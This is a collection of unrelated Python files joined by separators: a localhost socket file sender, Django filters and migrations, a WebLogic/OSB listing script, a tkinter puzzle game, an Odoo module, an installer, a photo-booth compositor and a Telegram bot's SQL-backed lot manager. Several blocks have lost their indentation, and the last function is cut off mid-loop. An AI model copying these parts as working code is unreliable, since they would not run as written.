    # leaked both if a send raised). sendall() replaces send(): plain send()
    # may transmit only part of the buffer.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as ftp_sock:
        ftp_sock.connect(addr)
        print('连接上了!')
        if os.path.isfile(localpath):
            print('进入')
            # Fixed-size header: 128-byte filename field + long file size.
            byte_filepath = bytes(os.path.basename(localpath), encoding='utf-8')
            fhead = struct.pack('128sl', byte_filepath, os.stat(localpath).st_size)
            ftp_sock.sendall(fhead)
            with open(localpath, 'rb') as fo:
                while True:
                    filedata = fo.read(1024)
                    if not filedata:
                        break
                    ftp_sock.sendall(filedata)
            print('send over...')
if __name__ == '__main__':
    ftp_sendfile(('127.0.0.1',12345))
|
from django import template
from django.template.defaultfilters import stringfilter
from django.shortcuts import HttpResponse
from django.contrib import messages
register = template.Library()
@register.filter(name='splitdamage')
@stringfilter
def splitdamage(string):
    # Take the last comma-separated record and split it into '/'-separated
    # fields; return field 8 for long records, field 7 otherwise.
    # NOTE(review): with exactly 7 fields (len == 7 > 6) sspal[8] raises
    # IndexError — confirm whether the threshold should be > 7.
    spal=string.split(",")
    sspal=spal[-1].split("/")
    if len(sspal) > 6:
        return sspal[8]
    else:
        return sspal[7]
@register.filter(name='tablet_history')
@stringfilter
def tablet_history(string):
    """Parse an 'a/b/c,d/e/f,...' history string into a list of field lists."""
    return [record.split("/") for record in string.split(",")]
@register.filter(name='get_name')
@stringfilter
def get_name(string):
    """Resolve a center id (given as a string) to its Center.name."""
    from main.models import Center
    return Center.objects.get(center_id=int(string)).name
@register.filter(name='spitdamage')
@stringfilter
def spitdamage(string):
    # Look up a Database row by id and pull a damage value from the last
    # record of previous_allotment (flag at field 6, value at field 8) or
    # previous_centers (flag at field 5, value at field 7).
    # NOTE(review): implicitly returns None when neither record is flagged
    # 'D' — confirm templates tolerate that. Field positions are assumed
    # from the sibling filters; verify against the writers of these columns.
    from main.models import Database
    db=Database.objects.get(id=string)
    pal=db.previous_allotment
    pc=db.previous_centers
    if pal != "":
        spal=pal.split(",")
        sspal=spal[-1].split("/")
        if sspal[6] == "D":
            return sspal[8]
    if pc != "":
        spal=pc.split(",")
        sspal=spal[-1].split("/")
        if sspal[5] == "D":
            return sspal[7]
import pandas as pd

# Placeholder rows carry the literal string '0' in the 'title' column.
_DATA_DIR = "E:/Ramya/brushUps/Basics/CASE_STUDIES/GOOD_READS/Data/"

df_1 = pd.read_csv(_DATA_DIR + "WorstBooks.csv")
df_2 = pd.read_csv(_DATA_DIR + "tempWorstBooks.csv")
df_2.columns = list(df_1.columns)
# Boolean-mask filtering replaces groupby('title').get_group('0') + a
# row-by-row drop loop: get_group raised KeyError whenever there were no
# placeholder rows, and the per-row drop was O(n^2).
df_2 = df_2[df_2['title'] != '0']
# Overwrite df_1 rows (aligned on index) with the cleaned temp data.
df_1.update(df_2, overwrite=True)
df_1 = df_1[df_1['title'] != '0']
df_1.to_csv(_DATA_DIR + "worstBooksdetails.csv")
|
################################ DESCRIPTION ##################################
# Description: List ALL Services deployed in OSB Domain with Regular Expression
# Match.
#
# Author: Jesus A. Ruiz - linuxwayven@gmail.com
# Place: Caracas - Venezuela - Oracle de Venezuela
# Date: 16/06/15
#
# History
# 16/06/15 The Begin V1.0
#
# Quota: The Key to grown: Hard work.
#
###############################################################################
# Import Section
import socket
import os
import time
import re #Regular Expression Package
from com.bea.wli.sb.management.configuration import ALSBConfigurationMBean
from com.bea.wli.config import Ref
from java.lang import String
from com.bea.wli.config import Ref
from com.bea.wli.sb.util import Refs
from com.bea.wli.sb.management.configuration import CommonServiceConfigurationMBean
from com.bea.wli.sb.management.configuration import SessionManagementMBean
from com.bea.wli.sb.management.configuration import ProxyServiceConfigurationMBean
from com.bea.wli.monitoring import StatisticType
from com.bea.wli.monitoring import ServiceDomainMBean
from com.bea.wli.monitoring import ServiceResourceStatistic
from com.bea.wli.monitoring import StatisticValue
from com.bea.wli.monitoring import ResourceType
from weblogic.management.mbeanservers.edit import NotEditorException
from java.io import FileInputStream
PROP_FILE_NAME = "weblogic.properties"
def loadProperties ():
# Read Properties File
propInputStream = FileInputStream(PROP_FILE_NAME)
configProps = Properties()
configProps.load(propInputStream)
print 'Properties File Loaded'
return configProps;
# Load Configuration Properties
configuration = loadProperties();
# Set some constants (credentials/port from the properties file, the rest
# from the shell environment of the WLST session).
SCRIPT_NAME = 'get_osb_services_list_filtered_re.py'
DESCRIPTION = 'List ALL Services deployed in OSB Domain with Regular Expression Match.'
AUTHOR = 'Jesus A. Ruiz - linuxwayven@gmail.com'
WL_USERNAME = configuration.get("admin.username")
WL_PASSWORD = configuration.get("admin.password")
DOMAIN_PORT = configuration.get("domain.port")
RUN_USERNAME = os.getlogin()
LOCALHOST = socket.gethostname()
DOMAIN_NAME = os.getenv('WL_DOMAIN')
DOMAIN_DIR = os.getenv('WL_DOMAIN_DIR')
MWHOME = os.getenv('MW_HOME')
URL_CONNECT = configuration.get("domain.protocol") + '://' + LOCALHOST + ':' + DOMAIN_PORT
# NOTE(review): prints "URL CONNECTt3://..." — a separator space is likely missing.
print "URL CONNECT" + URL_CONNECT
ACTUAL_TIME = time.strftime("%H:%M:%S")
ACTUAL_DATE = time.strftime("%d/%m/%Y")
# Information Screen
print '#########################################################################'
print '#'
print '# DATE: ' + ACTUAL_DATE
print '# TIME: ' + ACTUAL_TIME
print '# MW HOME: ' + MWHOME
print '# SCRIPT NAME: ' + SCRIPT_NAME
print '# DESCRIPTION: ' + DESCRIPTION
print '# URL CONNECTION: ' + URL_CONNECT
print '#'
print '# AUTHOR: ' + AUTHOR
print '#'
print '#########################################################################'
print
print
# Connect with WL Server.. (WLST built-in `connect`)
print 'Try connection ..'
print
connect(WL_USERNAME, WL_PASSWORD, URL_CONNECT)
### Get the Configuration Manager
# Abort early if an OSB change session is open: ours, someone else's, or
# an unexpected error. (Python-2/Jython `except X, e` syntax throughout.)
cfgManager = getConfigManager()
try:
    cfgManager.getChanges()
    print '===> Currently there is a Session'
    if cfgManager.isEditor() == true:
        ### You are making changes!!!
        print '===> Looks like you started that session'
        print '===> You can check the console for any pending changes'
        print '===> Try rerunning this script after you release or commit the pending changes'
        exit()
except NotEditorException, e:
    if cfgManager.getCurrentEditor() is None:
        ### No session
        print 'No active session .. OK'
        pass
    else:
        ### Someone else is making changes
        userWithSession = cfgManager.getCurrentEditor().replace(' ', '')
        print '===> Currently there is a Session'
        print '===> User \"' +userWithSession+'\" is making the changes'
        print '===> Wait until \"' +userWithSession+'\" complete the current session'
        exit()
    pass
except Exception:
    ### Other Errors
    print '===> Error, see log for more info'
    exit()
print
print
# Main
domainRuntime()
servers = domainRuntimeService.getServerRuntimes();
print('################################################################')
print('# Java heap information per server')
print('################################################################')
print('%20s %10s %8s %8s %4s' % ('Server','Current','Free','Max','Free'))
for server in servers:
    # Heap figures converted from bytes to MB.
    # NOTE(review): `max` shadows the Python builtin inside this loop.
    free = int(server.getJVMRuntime().getHeapFreeCurrent())/(1024*1024)
    freePct = int(server.getJVMRuntime().getHeapFreePercent())
    current = int(server.getJVMRuntime().getHeapSizeCurrent())/(1024*1024)
    max = int(server.getJVMRuntime().getHeapSizeMax())/(1024*1024)
    print('%20s %7d MB %5d MB %5d MB %3d%%' % (server.getName(),current,free,max,freePct))
print
print
print 'Look for ALSB Object ..'
alsbCore = findService(ALSBConfigurationMBean.NAME, ALSBConfigurationMBean.TYPE)
print '.. OK'
print 'Find info about OSB Service Deployed ..'
# List every proxy service in the domain whose full name matches the
# regular expression STRING_MATCH.
allRefs = alsbCore.getRefs(Ref.DOMAIN)
STRING_MATCH = "BOLP"
for ref in allRefs:
    # Get Types
    typeID = ref.getTypeId()
    serviceFullName = ref.getFullName()
    if typeID == "ProxyService" :
        result = re.search(STRING_MATCH, ref.getFullName())
        if result != None:
            print 'Proxy : ' + serviceFullName
print
print
print
# Disconnect from Server..
print 'Disconnecting from Server ..'
disconnect()
# The End
print
print 'Exiting from the script now ..'
exit()
|
from tkinter import *
from tkinter import messagebox  # the wildcard import does not pull in the messagebox submodule
class Item:
    """Base escape-room puzzle: one riddle answer, up to three attempts,
    with results reported through tkinter message boxes."""

    def __init__(self):
        self.__itemDictionary = {}
        self.__roomOneDialogue = None
        self.__roomTwoDialogue = None
        self.__roomThreeDialogue = None
        self.__numTries = 0            # attempts used so far (max 3)
        self.__roomOneAnswer = "dog"
        self.__itemOne = "Random"
        self.__itemTwo = "Picture Frame"
        self.__itemThree = "Toy Car"
        self.__itemFour = "Beaker"

    def roomOneDialogue(self):
        """Return (and cache) the room-one intro text."""
        self.__roomOneDialogue = "Hello World! You have three tries."
        return self.__roomOneDialogue

    def roomTwoDialogue(self):
        """Return (and cache) the room-two intro text."""
        self.__roomTwoDialogue = "Bye World!"
        return self.__roomTwoDialogue

    def roomThreeDialogue(self):
        """Return (and cache) the room-three intro text."""
        self.__roomThreeDialogue = "I ran out of ideas"
        return self.__roomThreeDialogue

    def checkAnswer(self, userAnswer):
        """Consume one attempt, check *userAnswer*, and report via dialogs."""
        self.__numTries = self.__numTries + 1
        if self.__numTries <= 3:
            itemGained = self.guessTheAnswer(userAnswer)
        else:
            messagebox.showwarning(
                'NO MORE TRIES',
                "You have no more attempts")
            itemGained = False
        if itemGained:
            messagebox.showinfo(
                'Item Found',
                "You've found an item")
        else:
            messagebox.showwarning(
                'NO ITEM GAINED',
                "You did not find the item")

    def guessTheAnswer(self, entryData):
        """Return True on a correct guess; warn and return False otherwise.

        The original used ``while`` as an ``if`` (both branches returned on
        the first pass); this is the equivalent plain conditional.
        """
        if entryData == self.__roomOneAnswer:
            return True
        messagebox.showwarning(
            'INCORRECT',
            "That is not the correct answer, try again")
        return False
class RoomTwo(Item):
    """Second room: Item's flow with its own riddle answer."""

    def __init__(self):
        # The original skipped Item.__init__, so inherited methods reading
        # Item's attributes (e.g. checkAnswer's try counter) raised
        # AttributeError. Chaining up fixes that.
        super().__init__()
        self.__roomTwoAnswer = "human"

    def guessTheAnswer(self, entryData):
        """Return True on a correct guess; warn and return False otherwise."""
        if entryData == self.__roomTwoAnswer:
            return True
        messagebox.showwarning(
            'INCORRECT',
            "That is not the correct answer, try again")
        return False
class RoomThree(Item):
    """Third room: Item's flow with its own riddle answer."""

    def __init__(self):
        # Chain up so inherited Item methods have their attributes.
        super().__init__()
        # The original line was an unterminated string literal ("mind) — a
        # syntax error that broke the whole module; the answer is "mind".
        self.__roomThreeAnswer = "mind"

    def guessTheAnswer(self, entryData):
        """Return True on a correct guess; warn and return False otherwise."""
        if entryData == self.__roomThreeAnswer:
            return True
        messagebox.showwarning(
            'INCORRECT',
            "That is not the correct answer, try again")
        return False
|
# Copyright 2022 Ecosoft Co., Ltd (https://ecosoft.co.th)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html)
from openerp import models, fields, api
class SaleOrder(models.Model):
    """Extend sale.order with temporary-delivery-bill tracking.

    NOTE(review): the header says 2022 but imports from `openerp` (the
    pre-v10 Odoo namespace) — confirm the target Odoo version.
    """
    _inherit = "sale.order"
    # Number of linked temporary delivery bills (for the smart button).
    delivery_bill_count = fields.Integer(
        string="Delivery Bill Count",
        compute="_compute_delivery_bill_count",
    )
    delivery_bill_ids = fields.One2many(
        comodel_name="temporary.delivery.bill",
        inverse_name="order_id",
    )
    @api.multi
    @api.depends("delivery_bill_ids")
    def _compute_delivery_bill_count(self):
        # Recomputed whenever the one2many changes.
        for rec in self:
            rec.delivery_bill_count = len(rec.delivery_bill_ids)
    @api.multi
    def view_temporary_delivery_bill(self):
        """Open the delivery-bill action filtered to this order, with
        defaults prefilled from the order's partner and lines."""
        self.ensure_one()
        action = self.env.ref(
            "sale_temporary_delivery_bill.temporary_delivery_bill_action")
        result = action.read()[0]
        # Update context: prefill a new bill with one line per order line
        # ((0, 0, vals) = create command in an x2many field).
        context = self._context.copy()
        context.update({
            "default_partner_id": self.partner_id.id,
            "default_order_id": self.id,
            "default_delivery_bill_lines": [(0, 0, {
                "product_id": line.product_id.id,
                "product_uom_qty": line.product_uom_qty,
                "product_uom": line.product_uom.id
            }) for line in self.order_line]
        })
        # Update result: restrict the list to this order's bills.
        result.update({
            "context": context,
            "domain": [("order_id", "=", self.id)]
        })
        return result
|
import os
import logging
# Verbose logging with file/line prefixes for this installer script.
logging.basicConfig(level=logging.DEBUG,
                    format='%(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
def clone(service, dir, remote='https://github.com/'):
    # Clone <remote><service>.git into src/<dir> via the shell.
    cmd = 'cd src/' + dir + ' && git clone ' + remote + service + '.git'
    os.system(cmd)
def run(arg):
    # Interactive (re)install: confirms with the user, optionally wipes src/,
    # then clones the core repositories. Python 2 (`raw_input`).
    logging.info('Install')
    logging.warning('It will be clean and install, please make sure it is safe ?')
    safe = raw_input('( install / clean / other type is cancel )')
    if safe == 'install' or safe == 'clean':
        if safe == 'clean':
            os.system('rm -rf src')
        os.system('mkdir src')
        os.system('mkdir src/default')
        # NOTE(review): dir=' ' makes the shell run `cd src/  && ...`, i.e.
        # catkin lands in src/ itself — confirm this is intentional.
        clone('ros/catkin', ' ')
        clone('EasyROS/ROServer', 'default')
        clone('EasyROS/shellservice', 'default')
        clone('EasyROS/webservice', 'default')
        clone('EasyROS/env_public', 'default')
def exe(arg):
    """Clone a single service repository into src/default."""
    logging.info('Install')
    clone(arg, 'default')
|
#
# IMPORTS
#
from snack import *
from model.config import GA_VERSION
#
# CONSTANTS
#
#
# CODE
#
class FirstScreen:
    """
    Initial splash screen: shows the product name and GA version in a
    one-cell snack grid. (The previous docstring, about LVM volume groups,
    was a copy-paste from another screen.)
    """
    def __init__(self, screen):
        """
        Constructor
        @type screen: SnackScreen
        @param screen: SnackScreen instance
        """
        self.__screen = screen
        self.__grid = GridForm(self.__screen, "IBM zKVM", 1, 1)
    # __init__()
    def show(self):
        """
        Draws the splash text and refreshes the screen.
        @rtype: nothing
        @returns: nothing
        """
        omsg = TextboxReflowed(30, "IBM zKVM %s..." % GA_VERSION)
        self.__grid.add(omsg, 0, 0)
        self.__grid.draw()
        self.__screen.refresh()
    # show()
# FirstScreen
|
# -*- coding: utf-8 -*-
from PIL import Image, ImageDraw, ImageFont
from pibooth import fonts
from pibooth.pictures import resize_keep_aspect_ratio
def concatenate_pictures(pictures, footer_texts, bg_color, text_color):
    """
    Merge up to 4 PIL images and retrun concatenated image as a new PIL image object.
    Configuration of the final picture depends on the number of given pictues::
       +---------+     +---------+     +---+-+---+     +---------+
       |         |     |   +-+   |     |   |1|   |     | +-+ +-+ |
       |         |     |   |1|   |     |   +-+   |     | |1| |2| |
       |   +-+   |     |   +-+   |     |   +-+   |     | +-+ +-+ |
       |   |1|   |     |         |     |   |2|   |     |         |
       |   +-+   |     |   +-+   |     |   +-+   |     | +-+ +-+ |
       |         |     |   |2|   |     |   +-+   |     | |3| |4| |
       |         |     |   +-+   |     |   |3|   |     | +-+ +-+ |
       +---------+     +---------+     |   +-+   |     +---------+
    """
    widths, heights = zip(*(i.size for i in pictures))
    # starting here we consider that all the images have the same height and widths
    # Margin between/around photos: 5% of the photo height.
    inter_width = max(heights) // 20
    if len(pictures) == 1:
        new_width = max(widths) + inter_width * 2
        new_height = max(heights) + inter_width * 2
    elif len(pictures) == 2:
        new_width = max(widths) + inter_width * 2
        new_height = max(heights) * 2 + inter_width * 3
    elif len(pictures) == 3:
        new_width = max(widths) + inter_width * 2
        new_height = max(heights) * 3 + inter_width * 4
    elif len(pictures) == 4:
        # 2x2 grid.
        new_width = max(widths) * 2 + inter_width * 3
        new_height = max(heights) * 2 + inter_width * 3
    else:
        raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
    matrix = Image.new('RGB', (new_width, new_height), color=bg_color)
    x_offset = inter_width
    y_offset = inter_width
    # Consider that the photo are correctly ordered
    matrix.paste(pictures[0], (x_offset, y_offset))
    if len(pictures) == 2:
        y_offset += (pictures[0].size[1] + inter_width)
        matrix.paste(pictures[1], (x_offset, y_offset))
    elif len(pictures) == 3:
        y_offset += (pictures[0].size[1] + inter_width)
        matrix.paste(pictures[1], (x_offset, y_offset))
        y_offset += (pictures[1].size[1] + inter_width)
        matrix.paste(pictures[2], (x_offset, y_offset))
    elif len(pictures) == 4:
        x_offset += (pictures[0].size[0] + inter_width)
        matrix.paste(pictures[1], (x_offset, y_offset))
        y_offset += (pictures[1].size[1] + inter_width)
        x_offset = inter_width
        matrix.paste(pictures[2], (x_offset, y_offset))
        x_offset += (pictures[2].size[0] + inter_width)
        matrix.paste(pictures[3], (x_offset, y_offset))
    # Fit the photo matrix into the top 2400x3000 area of the final canvas.
    # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (use
    # Image.Resampling.LANCZOS there) — confirm the pinned Pillow version.
    matrix = matrix.resize(resize_keep_aspect_ratio(matrix.size, (2400, 3000)), Image.ANTIALIAS)
    final_width, final_height = 2400, 3600
    final_image = Image.new('RGB', (final_width, final_height), color=bg_color)
    final_image.paste(matrix, ((final_width - matrix.size[0]) // 2, (3000 - matrix.size[1]) // 2))
    # Text part: two centered footer lines (name, then date) below the photos.
    x_offset = 300
    y_offset = 2900
    draw = ImageDraw.Draw(final_image)
    name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), 400)
    name_width, _ = draw.textsize(footer_texts[0], font=name_font)
    draw.text(((final_width - name_width) // 2, y_offset), footer_texts[0], text_color, font=name_font)
    date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), 200)
    date_width, _ = draw.textsize(footer_texts[1], font=date_font)
    draw.text(((final_width - date_width) // 2, y_offset + 400), footer_texts[1], text_color, font=date_font)
    return final_image
def generate_picture_from_files(image_files_list, footer_texts, bg_color=(255, 255, 255), text_color=(0, 0, 0)):
    """
    Open every file in *image_files_list* and concatenate them into the
    final framed picture with footer texts.
    """
    pictures = [Image.open(path) for path in image_files_list]
    return concatenate_pictures(pictures, footer_texts, bg_color=bg_color, text_color=text_color)
|
from table_to_entity import *
class Template(object):
    """Abstract code-template renderer: subclasses build and return a
    source-code string from keyword arguments.

    NOTE(review): the original base was `Object`, undefined unless the
    table_to_entity star-import provides it; `object` is the intended base.
    """

    def get_template(self, *args, **kwargs) -> str:
        # Abstract hook; concrete templates return the rendered text.
        pass
class TsCypressTemplate(Template):
    """Render a TypeScript `namespace Cypress` type declaration."""

    _TEMPLATE = ''' namespace Cypress {
    type %s = {
        %s
    }
}'''

    def get_template(self, *args, **kwargs) -> str:
        """
        :param args:
        :param kwargs: class_name = str, params = []
        :return:
        """
        entity = kwargs['entity_name']
        # One "name : type;" line per (name, type) pair.
        body = ';\n '.join('%s : %s' % (field[0], field[1]) for field in kwargs['fields']) + ';'
        return self._TEMPLATE % (entity, body)
|
# Small exception-handling demo: read two ints and attempt arithmetic.
a=int(input('enter value of a:'))
b=int(input('enter value of b:'))
try:
    c=a+b
    d=a-b
    # NOTE(review): a/0 always raises ZeroDivisionError — possibly the point
    # of the demo, but presumably a/b was intended; confirm.
    e=a/0
    print(c,d,e)
except Exception as e:
    print(e)
|
from utils.parse_input import fetch_input
from typing import List
def part1(parsed_inputs: List[int]) -> int:
    """
    Problem: find the pair of entries summing to 2020 and return their product.

    Returns -1 when no such pair exists. Checks only numbers already seen,
    so an entry cannot be paired with itself (the original's whole-list set
    wrongly returned 1010*1010 for an input containing a single 1010).
    """
    seen = set()
    for n in parsed_inputs:
        rem = 2020 - n
        if rem in seen:
            return n * rem
        seen.add(n)
    return -1
def part2(parsed_inputs: List[int]) -> int:
    """
    Problem: find 3 numbers in the list summing to 2020 and return their product.

    Returns -1 when no such triple exists. Uses index-distinct combinations:
    the original started its inner loop at i and tested membership in a set
    of all values, so one element could be counted twice (e.g. 1000+1000+20
    "found" with a single 1000 present).
    """
    from itertools import combinations
    for a, b, c in combinations(parsed_inputs, 3):
        if a + b + c == 2020:
            return a * b * c
    return -1
def main():
    """Read the puzzle input and print both solutions."""
    numbers = [int(line) for line in fetch_input('day1-input.txt')]
    print("part 1 solution: {}".format(part1(numbers)))
    print("part 2 solution: {}".format(part2(numbers)))


if __name__ == '__main__':
    main()
# Generated by Django 3.0.8 on 2020-07-17 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add arrivalTime, departureTime and experience fields to PlaceInfo.

    Auto-generated; preserve_default=False means the defaults below are
    one-off backfill values for existing rows, not model defaults.
    """
    dependencies = [
        ('GoForHolidayApp', '0002_remove_placeinfo_experience'),
    ]
    operations = [
        migrations.AddField(
            model_name='placeinfo',
            name='arrivalTime',
            field=models.CharField(default='', max_length=10),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='placeinfo',
            name='departureTime',
            field=models.CharField(default=' ', max_length=10),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='placeinfo',
            name='experience',
            field=models.TextField(default=' ', max_length=1000),
            preserve_default=False,
        ),
    ]
|
from telebot import types
class LotsManager:
    def __init__(self, bot):
        # Keep both the bot and a direct handle on its DB connection.
        self.bot = bot
        self.connection = bot.connection
def get_lots(self, user, only_created=False):
cur = self.connection.cursor()
show_all = user.get_property('show_all')
if show_all:
if not only_created:
cur.execute("SELECT * FROM lots")
else:
cur.execute("SELECT * FROM lots WHERE user_id=%s", (user.id,))
else:
cur.execute("SELECT * FROM lots WHERE id IN(SELECT lot_id FROM favourite WHERE user_id=%s)", (user.id,))
return cur.fetchall()
    def search_lots(self, user, keyword):
        # Substring search on lot titles; restricted to the user's
        # favourites unless their show_all flag is set.
        cur = self.connection.cursor()
        show_all = user.get_property('show_all')
        if show_all:
            cur.execute("SELECT * FROM lots WHERE title LIKE %s", ('%' + keyword + '%',))
        else:
            cur.execute("""SELECT * FROM lots WHERE title LIKE %s AND
            id IN(SELECT lot_id FROM favourite WHERE user_id=%s)""", ('%' + keyword + '%', user.id,))
        return cur.fetchall()
def get_lot_by_title(self, title):
cur = self.connection.cursor()
cur.execute("SELECT * FROM lots WHERE title=%s", (title,))
resp = cur.fetchone()
return resp
    def is_title_free(self, title):
        # A title is free when no lot row uses it yet.
        return self.get_lot_by_title(title) is None
    def create_lot(self, user):
        # Build a new lot from the draft fields stashed on the user
        # ('lot_*' properties); keys are stored newline-separated in `bunch`
        # and basic_keys_count records how many were supplied initially.
        title = user.get_property('lot_title')
        desc = user.get_property('lot_description')
        price = user.get_property('lot_price')
        keys = user.get_property('lot_keys')
        basic_keys_count = len(keys.split('\n'))
        cur = self.connection.cursor()
        cur.execute("INSERT INTO lots (title, description, bunch, price, basic_keys_count, user_id) "
                    "VALUES(%s, %s, %s, %s, %s, %s)", (title, desc, keys, price, basic_keys_count, user.id))
        self.connection.commit()
def update_lot(self, user):
id = user.get_property('lot_id')
title = user.get_property('lot_title')
desc = user.get_property('lot_description')
price = user.get_property('lot_price')
keys = user.get_property('lot_keys')
cur = self.connection.cursor()
cur.execute("UPDATE lots SET title=%s, description=%s, price=%s, bunch=%s WHERE id=%s", (title, desc, price, keys, id))
self.connection.commit()
def get_property(self, id, name):
cursor = self.bot.connection.cursor()
cursor.execute("SELECT " + name + " FROM lots WHERE id=%s", (id,))
resp = cursor.fetchone()
return resp[0]
def set_property(self, id, name, value):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET " + name + "=%s WHERE id=%s", (value, id))
self.connection.commit()
def delete_lot(self, id):
cursor = self.bot.connection.cursor()
cursor.execute("DELETE FROM lots WHERE id=%s", (id,))
self.connection.commit()
def get_owner_address(self, id):
owner_id = self.get_property(id, 'user_id')
cursor = self.bot.connection.cursor()
cursor.execute("SELECT address FROM users WHERE id=%s", (owner_id,))
return cursor.fetchone()[0]
def put_like(self, id, user_id):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET likes=likes+1 WHERE id=%s", (id,))
cursor.execute("INSERT INTO favourite (user_id, lot_id) VALUES(%s, %s)", (user_id, id))
self.connection.commit()
def put_dislike(self, id, user_id):
cursor = self.bot.connection.cursor()
cursor.execute("UPDATE lots SET dislikes=dislikes+1 WHERE id=%s", (id,))
cursor.execute("DELETE FROM favourite WHERE user_id=%s AND lot_id=%s", (user_id, id))
self.connection.commit()
def get_keys_count(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return 0
else:
return len(bunch.split('\n'))
def get_key(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return None
else:
keys = bunch.split('\n')
return keys[0]
def clear_key(self, id):
bunch = self.get_property(id, 'bunch')
if bunch == '':
return
else:
keys = bunch.split('\n')
bunch = ''
for i in range(1, len(keys)):
bunch = bunch + keys[i]
if i + 1 < len(keys):
bunch = bunch + '\n'
self.set_property(id, 'bunch', bunch)
def show_info(self, lot_id, user):
title = self.get_property(lot_id, 'title')
desc = self.get_property(lot_id, 'description')
status = self.get_property(lot_id, 'active')
likes = self.get_property(lot_id, 'likes')
dislikes = self.get_property(lot_id, 'dislikes')
available = self.get_keys_count(lot_id)
all = self.get_property(lot_id, 'basic_keys_count')
sold = all - available
msg_text = user.lang.LOT_INFO.format(title, desc, status, all, sold, available, likes, dislikes)
markup = types.InlineKeyboardMarkup()
user_id = self.get_property(lot_id, 'user_id')
price = self.get_property(lot_id, 'price')
if user_id == user.id:
markup.add(types.InlineKeyboardButton(text=user.lang.ACTIVATE_BTN,
callback_data=user.lang.ACTIVATE_BTN),
types.InlineKeyboardButton(text=user.lang.DEACTIVATE_BTN,
callback_data=user.lang.DEACTIVATE_BTN))
markup.add(types.InlineKeyboardButton(text=user.lang.EDIT_BTN,
callback_data=user.lang.EDIT_BTN),
types.InlineKeyboardButton(text=user.lang.DELETE_BTN,
callback_data=user.lang.DELETE_BTN))
else:
markup.add(types.InlineKeyboardButton(text=user.lang.BUY_FOR.format(price),
callback_data=user.lang.BUY_FOR))
self.bot.tg_bot.send_message(user.id, text=msg_text, reply_markup=markup, parse_mode="HTML")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
    # Initial schema for the django_emarsys app: Event, EventData,
    # EventInstance and EventInstanceData, plus uniqueness constraints
    # and the Event.kwargs through-relation.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('contenttypes', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('emarsys_id', models.IntegerField(unique=True, null=True)),
                ('name', models.CharField(unique=True, max_length=1024, blank=True)),
            ],
            options={
                'ordering': ['name'],
                'permissions': [('can_trigger_event', 'Can trigger emarsys events.')],
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='EventData',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=1024)),
                ('kwarg_name', models.CharField(max_length=1024)),
                ('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=django.db.models.deletion.CASCADE), ),
                ('event', models.ForeignKey(to='django_emarsys.Event', on_delete=django.db.models.deletion.CASCADE)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='EventInstance',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('recipient_email', models.CharField(max_length=1024)),
                ('context', models.TextField()),
                ('when', models.DateTimeField(auto_now_add=True)),
                ('source', models.CharField(max_length=1024, choices=[('automatic', 'automatic'), ('manual', 'manual')])),
                ('result', models.CharField(max_length=1024, blank=True)),
                ('result_code', models.CharField(max_length=1024, blank=True)),
                ('state', models.CharField(default='sending', max_length=1024, choices=[('sending', 'sending'), ('error', 'error'), ('success', 'success')])),
                ('event', models.ForeignKey(to='django_emarsys.Event', on_delete=django.db.models.deletion.CASCADE)),
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True, on_delete=django.db.models.deletion.CASCADE)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='EventInstanceData',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=django.db.models.deletion.CASCADE)),
                ('event_data', models.ForeignKey(to='django_emarsys.EventData', on_delete=django.db.models.deletion.CASCADE)),
                ('event_trigger', models.ForeignKey(to='django_emarsys.EventInstance', on_delete=django.db.models.deletion.CASCADE)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AlterUniqueTogether(
            name='eventinstancedata',
            unique_together=set([('event_trigger', 'event_data')]),
        ),
        migrations.AlterUniqueTogether(
            name='eventdata',
            unique_together=set([('event', 'kwarg_name'), ('event', 'name')]),
        ),
        migrations.AddField(
            model_name='event',
            name='kwargs',
            field=models.ManyToManyField(to='contenttypes.ContentType', through='django_emarsys.EventData'),
            preserve_default=True,
        ),
    ]
|
#!/usr/bin/python
from pylab import *
import cv2
from scipy.optimize import leastsq
def apply_transformation_on_points(points, H):
    '''
    Apply the homography H to every input point.
    @points: list of input points, each represented as (row, col)
    @H: 3x3 transformation matrix
    @return: list of transformed, dehomogenized points as (row, col) tuples
    '''
    def _map_one(pt):
        # Lift to homogeneous coordinates, transform, then dehomogenize.
        hom = dot(H, array([pt[0], pt[1], 1.]))
        hom = hom / hom[-1]
        return (hom[0], hom[1])
    return [_map_one(pt) for pt in points]
def solve_homo_system_with_llsm(pts1, pts2):
    '''
    Solve the homogeneous linear least-squares problem built from the
    eight-point-style constraint rows of the matching points.
    @pts1, pts2: lists of matching points
    @return: ndarray of length 9, the minimizing unit vector
    '''
    count = len(pts1)
    A = zeros((count, 9))
    for idx in range(count):
